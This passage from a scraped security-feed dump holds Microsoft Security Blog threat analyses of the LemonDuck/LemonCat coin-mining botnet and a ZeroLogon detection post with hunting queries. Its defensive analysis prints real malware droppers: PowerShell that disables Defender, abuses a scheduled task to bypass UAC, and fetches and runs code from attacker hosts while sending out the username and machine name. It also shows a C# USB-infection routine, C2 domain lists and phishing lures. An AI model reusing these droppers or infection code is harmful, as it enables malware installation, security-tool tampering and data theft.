amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n![Diagram showing attacker activity following infection of LemonDuck malware, highlight activities common to the LemonDuck and LemonCat infrastructure, and showing unique behavior for each](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/attack-chain.png)\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n![Screenshot of email related to LemonDuck attack](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/lemon-duck-email-sample.png)\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mssecure", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2020-12-02T21:51:37", "description": "There has been a huge focus on the recently patched CVE-2020-1472 Netlogon Elevation of Privilege vulnerability, widely known as ZeroLogon. While Microsoft strongly recommends that you deploy the latest security updates to your servers and devices, we also want to provide you with the best detection coverage possible for your domain controllers. [Microsoft Defender for Identity](<https://www.microsoft.com/en-us/microsoft-365/security/identity-defender>) along with other [Microsoft 365 Defender](<https://aka.ms/m365d>) solutions detect adversaries as they try to exploit this vulnerability against your domain controllers.\n\n## Here is a sneak peek into our detection lifecycle\n\nWhenever a vulnerability or attack surface is disclosed, our research teams immediately investigate exploits and produce various methods for detecting attacks. This is highlighted in our response to suspected [WannaCry](<https://docs.microsoft.com/en-us/defender-for-identity/compromised-credentials-alerts#suspected-wannacry-ransomware-attack-external-id-2035>) attacks and with the alert for [Suspected SMB (Server Message Block) packet manipulation](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/lateral-movement-alerts#suspected-smb-packet-manipulation-cve-2020-0796-exploitation---preview-external-id-2406>) (CVE-2020-0796 exploitation). These detection methods are tested in our lab environment, and experimental detectors are deployed to Microsoft Defender for Identity to assess performance and accuracy and find possible attacker activity.\n\nOver the past two months since CVE-2020-1472 was first disclosed, interest in this detection rapidly increased. This happened even if we did not observe any activity matching exploitation of this vulnerability in the initial weeks after the August security updates. It generally takes a while before disclosed vulnerabilities are successfully reverse-engineered and corresponding mechanisms are built.\n\nThis lack of activity changed on September 13, when we triggered a surge in alerts. Simultaneously, this increase in activity was followed by the publication of several proof-of-concept tools and demo exploits that can leverage the vulnerability.\n\n![Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/s-1-1.png)\n\n_Figure 1: Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020_\n\nMicrosoft Defender for Identity can detect this vulnerability early on. It covers both the aspects of exploitation and traffic inspection of the Netlogon channel.\n\n![Alert page experience](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/s-2-1.png)\n\n_Figure 2: Alert page experience_\n\nWith this Microsoft Defender for Identity alert, you will be able to identify:\n\n * The device that attempted the impersonation.\n * The domain controller.\n * The targeted asset.\n * Whether the impersonation attempts were successful.\n\nFinally, customers using [Microsoft 365 Defende](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>)r can take full advantage of the power of the signals and alerts from Microsoft Defender for Identity, combined with behavioral events and detections from [Microsoft Defender for Endpoint.](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) This coordinated protection enables you not just to observe Netlogon exploitation attempts over network protocols, but also to see device process and file activity associated with the exploitation.\n\n## A close look at some of the earliest ZeroLogon attacks\n\nZeroLogon is a powerful vulnerability for attackers to leverage, but in a normal attack scenario, it will require an initial entry vector inside an organization to facilitate exploitation against domain controllers. During initial monitoring of security signals, [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) observed ZeroLogon exploitation activity in multiple organizations. In many cases, it was clear that the activity was originated from red teams or pen testers using automated vulnerability scanners to locate vulnerable servers. However, Microsoft researchers were also able to identify a few limited cases of real attackers jumping on the ZeroLogon train to expand their perimeter into organizations that, after a month of a patch being available, were still running unpatched domain controllers.\n\n![Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/s-3.png)\n\n_Figure 3: Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale_\n\nOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution. Following the web shell installation, this attacker quickly deployed a Cobalt Strike based payload and immediately started exploring the network perimeter and targeting domain controllers found with the ZeroLogon exploit.\n\nUsing the @MsftSecIntel Twitter handle, we [publicly shared some file indicators](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) used during the attack. We also shared the variations of the ZeroLogon exploits we detected, many of which were recompiled versions of well-known, publicly available proof-of-concept code. Microsoft Defender for Endpoint can also detect certain file-based versions of the CVE-2020-1472 exploit when executed on devices protected by Microsoft Defender for Endpoints.\n\n![Placeholder](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/s-4.png)\n\n## Hunting for ZeroLogon in Microsoft 365 Defender\n\nCombining signals from Microsoft Defender for Endpoint with the ZeroLogon alerts from Microsoft Defender for Identity can help assess the nature of the alert quickly. Microsoft 365 Defender automatically leverages signals from both products. It has logic that constantly attempts to combine alerts and events using a variety of correlation logic based on knowledge of cause-effect attack flows, the MITRE ATT&CK framework, and machine learning models.\n\nIn this section, we provide an example (in the simplified form of an [advanced hunting query](<https://docs.microsoft.com/en-gb/microsoft-365/security/mtp/advanced-hunting-overview?view=o365-worldwide>)) of how Microsoft 365 Defender correlation logic operates behind-the-scenes to combine alerts, reducing Security Operations Centers (SOC) fatigue and facilitating investigation.\n\nThe following Microsoft 365 Defender advanced hunting queries identify process and network connection details from the source device suspected to have launched the NetLogon exploit.\n\n![Placeholder](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/s-6.png)\n\nFirst, we gather the relevant details on recent Netlogon exploit attempts from Microsoft Defender for Identity alerts. This will help populate the AlertId for the second query.\n\n`// Find all Netlogon exploit attempt alerts containing source devices \nlet queryWindow = 3d; \nAlertInfo \n| where Timestamp > ago(queryWindow) \n| where ServiceSource == \"Azure ATP\" \n| where Title == \"Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)\" \n| join (AlertEvidence \n| where Timestamp > ago(queryWindow) \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n) on AlertId \n| summarize by AlertId, DeviceId, Timestamp`\n\nNext, populate one AlertId from the prior query into NLAlertId in the next query to hunt for the likely process that launched the exploit and its network connection to the domain controller:\n\n`// Find potential endpoint Netlogon exploit evidence from AlertId \nlet NLAlertId = \"insert alert ID here\"; \nlet lookAhead = 1m; \nlet lookBehind = 6m; \nlet NLEvidence = AlertEvidence \n| where AlertId == NLAlertId \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n| summarize Timestamp=arg_min(Timestamp, *) by DeviceId; \nlet sourceMachine = NLEvidence | distinct DeviceId; \nlet alertTime = todatetime(toscalar(ZLEvidence | distinct Timestamp)); \nDeviceNetworkEvents \n| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead)) \n| where DeviceId in (sourceMachine) \n| where RemotePort == 135 or RemotePort between (49670 .. 49680) \n| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl \n| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl`\n\nThis query can return a result that looks like this:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/11/Screenshot-125.png)\n\nTying Microsoft Defender for Endpoint data together with the original Microsoft Defender for Identity alert can give a clearer picture as to what happened on the device suspected of launching the exploit. This could save SOC analysts time when investigating alerts, because the relevant details are there to determine if it was caused by a curious researcher or from an actual attack.\n\n## Defend against ZeroLogon\n\nLearn more about the [alert here](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/compromised-credentials-alerts#suspected-netlogon-privilege-elevation-attempt-cve-2020-1472-exploitationexternalid2411>), along with information on all the alerts Defender for Identity uses to help you stay protected from identity-based attacks.\n\nAlso, feel free to review [our guidance ](<https://support.microsoft.com/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)on managing changes in Netlogon secure channel connections and how you can prevent this vulnerability\n\nCustomers with Microsoft Defender for Endpoint can get additional guidance from[ the threat analytics article ](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fsecuritycenter.windows.com%2Fthreatanalytics3%2Fc57607da-fb94-43f3-b8ba-1acda0242900%2Fanalystreport&data=02%7C01%7CDaniel.Naim%40microsoft.com%7C5a14a796515d428cb11608d86545b735%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637370697507756901&sdata=uxd2wKhtSyqr9A2dqhO9D7YW%2F7MgA%2F3o1WnmWjpmCO8%3D&reserved=0>)available in Microsoft Defender Security Center.\n\n## Get started today\n\nAre you just starting your Microsoft Defender for Identity journey? Begin a trial of [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for your organization.\n\nJoin the [Microsoft Defender for Identity Tech Community ](<https://techcommunity.microsoft.com/t5/Azure-Advanced-Threat-Protection/bd-p/AzureAdvancedThreatProtection>)for the latest updates and news about Identity Security Posture Management assessments, detections, and other updates.\n\nTo learn more about Microsoft Security solutions [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [Zerologon is now detected by Microsoft Defender for Identity](<https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-30T17:00:20", "type": "mmpc", "title": "Zerologon is now detected by Microsoft Defender for Identity", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2020-11-30T17:00:20", "id": "MMPC:D6D537E875C3CBD84822A868D24B31BA", "href": "https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T21:41:38", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n![Diagram showing chain of attacks from the LemonDuck and LemonCat infrastructure, detailing specific attacker behavior common to both and highlight behavior unique to each infra](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/attack-chain.png)\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-1.png)\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-2.png)\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-3.png)\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with 